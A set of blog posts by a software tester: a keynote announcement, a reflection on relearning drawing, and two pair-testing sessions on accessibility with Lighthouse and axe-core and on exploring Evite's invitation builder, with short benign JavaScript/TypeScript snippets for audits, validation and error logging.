Long story cut short: join me at Testing United 2018 in Bratislava and support me at my first keynote! Jokes apart, the schedule is out and it looks amazing. I'm looking forward to hearing talks from people I have listened to already, like Gojko Adzic. I'm really looking forward to meeting people I only know from social media, like Raluca Morariu, and finally hearing them talk! Last but not least, I'm so looking forward to getting inspired by people I didn't know yet and making new connections. One of the secrets I learned on my public speaking journey so far is that speakers speak for many different reasons. But one is very common: to get the opportunity to attend more conferences and learn from each other. I, as a speaker, am there to learn.

Another reason for me is to share my stories and experiences in order to give back to the community. My keynote "Next Stop: FlixBus! A Tester Exploring Developer Land" is exactly about that! Would you like to...
  • ... learn how testing throughout the workflow helps to shorten feedback loops and build quality in?
  • ... find out how to engage the whole team to resolve bottlenecks?
  • ... experiment with different approaches to find solutions in your context?
  • ... get tips to foster cross-team collaboration and grow a company-wide testing community?
  • ... discover how to explore beyond your product to drive continuous improvement?
Then join me at Testing United in Bratislava on November 19th & 20th!

Saturday, October 6, 2018

How Learning to Draw Helps Testing

Or: how I learned to look closely. And then even closer.

Today I attended the Growth Mindset meetup here in Munich. They were hosting a "You can learn everything! Like drawing" workshop, and it made me realize that I had received lots of training in the past in how to look closely. As our facilitator shared, learning to draw is not about training your hand, it's about learning to see like an artist. It's about perceiving your surroundings, the things, everything - as they are. Neither adding nor omitting anything.

My original intention in attending the workshop was to challenge myself to pick up drawing again. For the first half of my life I loved drawing. I took art as an intensive course back at school. I even considered studying art. But then I got frustrated and lost all motivation.

So, back then I had quite decent drawing skills; not overwhelmingly awesome, but good. Then I left drawing behind me for years. From time to time, I halfheartedly tried to pick it up again, got quickly frustrated by the results - and dropped it again. Why? Because I instantly compared them to my old level, neglecting the fact that back then I had been practicing drawing every - single - day, putting in many hours.

When I started to work, I had to establish a growth mindset to learn so many things I had never done before. With all the things I have learned since, I thought maybe I could use that new knowledge and experience to re-trigger the drawing topic. To discover the fun again. To practice the patience it requires. To train my eye for detail. There's a time for letting things be "good enough", and there's a time for not being satisfied with that. In any case, I would train my right brain half.

And it worked! I suddenly looked forward to this five hour workshop, taking place on a Saturday morning (not my usual time). The first hours triggered so many memories of the training I had received. Also, my first drawings after a long time were not so bad after all (I had expected them to be worse). All looking bright? Unfortunately not. The problem started when we came to the end of the workshop and our final drawing. That was when my brain interfered again, telling me that "my drawing should be better", that "I should be better". I did not manage to shut it up.

My lesson: I am well on my way to training my growth mindset further, in more areas, including areas I thought I had left behind. Still, there's much more work to do and effort to put in. It's the same as with every skill, like drawing - the growth mindset itself also has to be continuously trained and honed. Next time I hope I can keep my brain from interfering - a bit longer.

Friday, October 5, 2018

Testing Tour Stop #21: Pair Accessibility Testing with Alex

Alex? Now, this Alex is not the Alex I already paired with. This Alex is Alex de los Reyes, whom I met in person at CAST 2018. He had listened to my talk "Cross-team Pair Testing: Lessons of a Testing Traveler" and thereby learned about my testing tour. And was intrigued! Inspired by the moment, he agreed to pair test with Amit Wertheimer.
But how to get started? Alex and I had a call where I explained in more detail how I found partners to test with, how I prepared sessions, how I ran them, and how I followed up.
Even before we had this first call, Alex had scheduled a pair testing session with me. Ever since, I had been looking forward to this one, and it turned out to be awesome!

Testing for Accessibility: Why, What, How

As with most partners, we had several topics in mind to pair on. In the end we decided to go for accessibility, as we both wanted to get better in this area, and for Alex it's becoming really relevant in his current project. The best time to practice together!

At the beginning of our session we decided to first try our skills on a practice application and afterwards tackle a real production website to apply what we had learned. The demo we chose was Accessible University 3.0.
"Accessible University (AU) is a fictional university home page designed to demonstrate a variety of common web design problems that result in visitors with disabilities being unable to access content or features. [...] Use the AU site to
  1. demonstrate common web accessibility principles at trainings, presentations, and workshops on accessible web design.
  2. learn common web accessibility problems and solutions in an easy-to-understand way." (Accessible University 3.0)
The demo offers an inaccessible site where you can detect at least 18 accessibility issues, a list of all issues including detailed explanations, and an accessible version of the site with all issues fixed.

What can I say? We had a blast discussing our experiences, sharing our accessibility knowledge and finding issue after issue! First, we looked for quick wins using our eyes (we're biased beings), things that instantly stood out which we knew could cause trouble for people who have to rely on a different access to technology. Second, we inspected the page structure and found even more issues using the experience and knowledge we had. And third, we used tooling to discover further issues and get inspired to explore more. Alex does not like the WAVE Chrome extension too much and rather prefers Axe. However, for this session we decided to go for another option, letting me get to know another feature of the wonderfully useful Chrome DevTools: Lighthouse, which allows you to run audits for accessibility. The report provided an overall score, automatically detected issues and their instances, as well as a useful checklist of things to explore manually, as they cannot be detected automatically. Super easy, fast and really worth it.
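If you prefer a scriptable alternative, axe-core (the engine behind the Axe extension Alex mentioned) can be driven straight from the console once its script has been loaded into the page; a minimal sketch:

    // Run axe-core against the current document and list all violations
    axe.run(document).then(results => {
      results.violations.forEach(violation => {
        console.log(`${violation.id}: ${violation.help}`,
                    `(${violation.nodes.length} instance(s))`);
      });
    });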

As I can really recommend trying this demo app on your own, I won't list our findings directly in this blog post. If you'd like to compare your results with ours, then check out our mind map of potential issues. In the end, we compared them with the provided list of 18 accessibility issues and found that we had identified a lot of them! At the same time, we learned about many more problems we had not been aware of before, and solutions we didn't even know existed. Awesome!

With 15 minutes still to go, we decided to follow our original plan and tackle a production site as well. We selected agoda, a travel booking platform. Having only a very limited time box, we decided to use Lighthouse right away and discovered the page's score was not much higher than that of the inaccessible practice app. This way we found a lot of issues very quickly. We also stumbled across other usability issues, like a changing navigation menu or non-responsive design. Last but not least, we tried to tab through the homepage, which offered a navigation menu and a form to book a hotel room - and here's what happened. Just try it yourself!
  • For the first few tabs we saw where we were, as the navigation menu elements showed a blue highlighting frame.
  • The next few tabs suddenly did not show any focus anymore, so we got lost.
  • The next tab opened the calendar for the arrival date at the hotel - strange, as we had skipped the first form element to enter a destination.
  • We tabbed to the second calendar for the departure date, tabbed again and landed in a sort of drop-down / dialog / sub-form / whatever element to provide the number of rooms, adults and children.
  • We tabbed on. And found ourselves trapped in this very UI element! We could neither tab forward nor backward.
When reproducing the issue for this blog post, I tried to see whether we had really skipped the destination field by tabbing backwards from the calendars - and noticed that Shift+Tab did not let me tab backwards but had the same effect as Tab itself: both tabbed forward! I'm speechless.
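We can only speculate about the cause, of course, but a keyboard trap like this is often just a custom key handler that forgets about the modifier key. A purely hypothetical sketch (we never saw agoda's code) of the kind of bug that produces exactly this behavior:

    // Hypothetical stand-in for the widget's real focus logic
    function moveFocusToNextField() { /* focus the next field in the widget */ }

    const roomPicker = document.querySelector('.room-picker');  // hypothetical selector
    roomPicker.addEventListener('keydown', (event) => {
      if (event.key === 'Tab') {
        // Bug: event.shiftKey is never checked, so Shift+Tab also moves
        // focus forward and the user can never tab backwards out again.
        event.preventDefault();
        moveFocusToNextField();
      }
    });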

Looking Back

As with each pairing session, we took some time at the end to reflect on what we had learned and share our thoughts. First of all: the demo app was a really valuable target to explore; it raised awareness of the multiple traps to fall into when it comes to accessibility. Interestingly, we noticed we didn't even look at the accessible version of the page to see an example of how to do it well! This is definitely still worth looking into. In any case, we both loved our approach of first practicing with the demo app, getting our brains prepared, and then switching to a production application, being instantly able to spot issues there with the knowledge gained. We identified a lot within only 15 minutes - time well spent.

It turned out once again that bad accessibility design is often also bad user experience for everyone; designing accessible sites improves the experience for everyone else as well. However, accessibility has to be considered during design already. Nowadays there are so many tools to support us, for example for checking for sufficient color contrast already in the mockups.

Talking about our collaboration, it was once again a very easy session for both of us. We had agreed to use strong-style pairing and a mob timer to frequently switch roles. Alex had already gathered some experience with this approach and felt comfortable with it. Our flow was very natural. One fact especially caught our eye: we followed up on each other's ideas, using the "yes, and ..." rule from improvisational theater. Alex had already noticed that ignoring this rule is a common problem when pairing. In all the sessions of my testing tour, I found this to be one of the most important keys to pairing successfully with strangers and being productive from the first minute on.

The session was thoughtful. It was super productive. It was highly relevant for Alex's current project, where accessibility is a big part of the testing strategy. And the session was fun! Like several others before him, Alex also advised to "do it with someone else", as this makes it so much easier. "Don't test alone, for your own safety." I have nothing to add.

Monday, October 1, 2018

Testing Tour Stop #20: Pair Exploring Online Invitations with Claire

Pair testing with Claire Reckless was the next stop on my testing tour. We knew each other only from Twitter and Slack, and had never talked or even met in person. Still, when I saw the scheduling notice, I knew this was going to be great. And it was!

The Goal: Explore

Claire did not aim to focus on a specific topic. She shared that she had recently moved into a test lead role where she is not quite so hands-on anymore, so it would be great to have a session where we could focus on doing some actual testing. She was happy to pair with me and see what happened.

Having been on this testing tour for a while now, with many sessions done, I have a whole list of potential test targets ready to be tackled. For our session, I selected a subset of five applications that might fit our general exploration goal. At the beginning of our session, Claire decided to go for Evite, an online invitation service neither of us knew.

We had already agreed in advance to pair in strong style. Claire was familiar with this approach, so I simply shared screen control and briefly explained the mob timer that I prefer to use when pairing with new people. We set the timer to 4 minutes and off we went.

Stumbling and Frowning

Throughout our session, we stumbled over several issues, frowned at even more, and documented all noteworthy points in a mind map. Here's what we found.
  • We started off on the Evite homepage, wondering whether we needed to register to create an invitation, or how far we could get without signing up.
  • Right at the beginning, as the first navigator, Claire asked me to open the browser's DevTools. When scrolling through the homepage to look around at what this online service offered, we viewed several tabs highlighting the platform's features. When hovering over one of them, showing that you can handcraft invitations, we noticed in the DevTools console that errors were thrown: an image was not found and a video failed to load.
  • As we had the DevTools open and docked to the right side of the screen, the page's width was reduced. We noticed that this caused the top navigation menu to be displayed as a menu button on the top left instead. When opening it, we found a completely different-looking menu with differently ordered items. This felt strange and definitely not consistent.
  • We decided to search for invitation designs, using not the usual suspects that were offered but something different. We searched for "life role-playing", which returned zero results. We got suggestions to design our own invitation as well as several design proposals to start from; however, we missed the kind of search suggestions based on our input that we knew from other applications (like Google or Amazon, for example). We noted it down as a feature idea.
  • Going through the suggested invitation designs, we noticed that some of them had been replaced by advertisements that looked a lot like the other invitation designs. We did not like that at all - a dark pattern tricking users into clicking on these advertisements.
  • We browsed the offered categories, choosing "Birthday for Kids". The suggested designs seemed indeed to be filtered by category, and everything looked like a new search, with our previous search term apparently not maintained. We decided to use more filters and selected to see only free designs. Doing so, the result page told us that no templates matched our search, although we had seen free templates for the category before. We realized the reason: it had indeed maintained the former "life role-playing" search!
  • We removed our custom search term and then tried out further filters, like color or animations. When filtering for themes, we sometimes noticed strange gaps in the search result grid, leading to an inconsistent layout.
  • We viewed the details of an invitation template. It showed the selected design on top, with navigation arrows on both sides. Browsing through designs this way, we found designs that had not been in our previous search result. Later I saw that the tool-tip indeed says "Previous Design in Category"; still, this did not feel intuitive.
  • We chose to have a deeper look into the invitation template itself. We found that the design on top displayed placeholders for information we could fill in via a form below. We instantly thought of security testing, had this been our product to test.
  • The template offered a preview button, so we decided to use it to see what the invitation would look like. As we still had the DevTools open, we saw that validation errors had been thrown. Only by scrolling down further did we also see fields marked as required - not instantly obvious to users.
  • The required fields of the form were title, host, and date/time. We filled in title and host and decided to add a co-host. Interestingly, the co-host offered not only a name field but also an email address field. Strange. We decided to leave the email out for now. Date and time were two different fields; we went for only providing a date. Trying to preview now, we once again got validation errors: the co-host email was required, which had not been obvious before, and the time as well. Well then, we added a time and any value in the email address field, making the validation errors vanish. The preview failed again due to the invalid email address. Okay, we provided a valid email format.
  • We had selected an invitation template including a photo. It offered a default picture but required us to upload a custom one before previewing. The validation message said "Please upload a photo first by tapping on the camera" - but which camera? Having scrolled down to view the form, it was not clear what we needed to do. Scrolling up, we saw a camera icon next to the photo.
  • Clicking on the photo asked us to choose a file from our file system, with a file extension filter on image files. We decided to view all file types instead and selected a pdf file to see what would happen. A transparent overlay appeared over the whole screen, with nothing else to indicate to the user what had gone wrong. Again, as we had the DevTools open, we saw what had happened: a JavaScript error informed us that the page could not cope with the provided input. Clicking anywhere else on the page threw another error, as the non-existing dialog could not be closed. We even got thrown to a blank page when clicking on the zoom levels offered for the non-existing image. All this made us worry: if the application allowed unwanted file types and then could not cope with them, this was a security concern. Selecting such a file type can happen by mistake, but also with malicious intent. (See the sketch after this list for how such a check could fail more gracefully.)
  • Back to the start. We chose a template, filled out the required fields, and uploaded an actual image this time. We clicked somewhere else on the page by mistake - and saw that we had lost our photo. The upload had not actually saved the photo yet.
  • We learned that we had to confirm the upload by pressing a "Done" button, which saved the image. However, hovering over our uploaded photo, the tool-tip still showed "No file chosen".
  • We noticed the upload photo button had changed into an edit button. Clicking it opened a dialog titled "Custom Image". Hm, we couldn't select any standard image, so why "custom"? Also, the dialog asked whether we'd like to "modify" our image or upload a new one; the related button was labeled "Edit", however. Inconsistent.
  • We chose to edit our photo, noticing that it briefly displayed the previous photo before our custom image, which felt strange. We could zoom it, and we could rotate it - in 45° steps! We would have expected 90° as in other applications; however, it made sense to us that more angles are offered for customizing invitations. We could drag and drop the image to a new position. Editing the photo again, we noticed that the edit mode had discarded our selected zoom level, showing the image in its original size again. Not nice.
  • Now, having fulfilled all prerequisites, we were ready to try the preview. Pressing the button opened a dialog telling us we could now preview the invitation - this came as a surprise to us! There was no loading bar or any other signal that would justify a separate dialog instead of simply loading the preview.
  • The preview was opened in a new tab whose title informed us that we were viewing a preview. The page was displayed as read-only; we could not interact with it. Strangely, the entered co-host was not displayed anywhere.
  • We decided to add more information and see what would be displayed in the preview. The message from the host was displayed; the created poll was not. Strange, as we would have expected to see a preview of the actual invitation including all information.
  • We found that the preview tab could not simply be reloaded; another preview had to be requested, which got a different URL.
  • We created a "what to bring" list and found the field validation there to be simply incorrect. Filling in only items to bring, without quantities, triggered a validation error on the name field of the first item, telling us to "Please fill out at least one field" - which we clearly had done. We added the quantity for the first item, left it empty for the other items, and the list got created successfully - but it only included the first item.
  • We found we could still change designs with our details being maintained. Phew. We decided to save the draft by clicking the related button, and got referred to a sign-in page. The offered Google login button was framed by a red border, making it look like one of the field validation errors we had received before.
  • Well, we did not want to register, but there was no option to cancel or return to the previous screen. So we used the browser back button - and found ourselves back at the selected template, but with all our previously added information lost!
This was a perfect point to end our session, exactly meeting our time box.
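The broken pdf upload is a good example of why client-side file checks should fail gracefully. Here is a minimal sketch of how such a check could look; the element IDs are hypothetical, and a real product would of course have to validate again on the server side, as client-side checks can always be bypassed:

```
// Minimal sketch of a graceful client-side file type check for an upload
// control. The element IDs 'photo-input' and 'upload-error' are hypothetical.
const input = document.getElementById('photo-input') as HTMLInputElement;
const errorBox = document.getElementById('upload-error') as HTMLElement;

input.addEventListener('change', () => {
  const file = input.files?.[0];
  if (!file) return;
  // Check the reported MIME type instead of relying on the file picker's
  // extension filter, which the user can switch off (as we did).
  if (!file.type.startsWith('image/')) {
    errorBox.textContent = `"${file.name}" is not an image. Please choose a JPEG, PNG, or GIF file.`;
    input.value = ''; // reset so the user can pick another file
    return;
  }
  errorBox.textContent = '';
  // ... hand the validated file over to the actual upload logic here
});
```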

Focused, Fun, Fruitful

Claire shared that she enjoyed the session. It got her tester brain going again! She is doing lots of management these days, so this was refreshing and welcome to her. She felt that the session was really productive, too. We found lots of things on all kinds of levels: functionality, usability, even security. And time flew so fast! Using the mob timer set to 4 minutes, she was often surprised by how fast these 4 minutes passed. She said this kept us focused; switching our roles frequently helped a lot. Also, we didn't go down too many rabbit holes and stayed on track.

From my point of view, it was very easy to collaborate with Claire. We knew each other only vaguely from online and hadn't even met yet, but I felt we spoke the same language. We did not have to explain what we meant; we had a shared basis and could instantly test together. It was fun! Another interesting point for me was that Claire was the first of my pair testing partners to ask me to open the DevTools from the very start. I really loved that, as this is exactly what I do when testing on my own. When pairing, I try not to impose my own habits too much and to see how others tackle testing problems; this time it was refreshing to see her take the same approach. And these tools let us discover so many things already, without even diving deep, simply by having the console and network tabs open.
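If you want such failed resource loads to be impossible to miss, you can even surface them yourself. A minimal sketch of a console snippet that logs them, assuming nothing about the page under test; note that resource load errors do not bubble, so the listener needs to run in the capture phase:

```
// Minimal sketch: log failed resource loads (images, scripts, videos, ...)
// similar to what the DevTools console showed us during the session.
// The third argument 'true' registers the listener in the capture phase,
// which is required because resource 'error' events do not bubble.
window.addEventListener('error', (event: Event) => {
  const target = event.target as (HTMLElement & { src?: string }) | null;
  if (target?.src) {
    console.warn('Resource failed to load:', target.src);
  }
}, true);
```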

Reflecting on the kinds of issues we found in only 75 minutes of testing, considering that this is a production application, I really wonder how the people developing it approach testing and quality. I don't mean to assume bad intentions; I am not the one to judge their circumstances and challenges. Seeing an application like this just makes me very curious. When we find so many clear issues on the surface, without deeply knowing the application or testing further regarding security, accessibility, or anything else, it really makes me wonder what else there is to find.

All in all, our session was again enlightening: we practiced our testing and collaboration skills and exchanged ideas and approaches. It was great. And the best thing: we will meet each other in real life quite soon at Agile Testing Days 2018, as both Claire and I are speaking there!